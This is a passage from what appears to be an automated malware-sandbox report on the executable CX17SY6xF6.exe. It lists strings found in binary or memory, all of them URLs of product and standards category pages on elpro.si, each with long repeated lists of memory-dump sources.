00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/vecih-plinov/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-30-eu/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-53-eu/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/60584/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/60751/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/ams-2750/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/cqi/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/din-en-301-489/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-12830/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-13060/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/en-285/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/fcm-ec-1935-2004/
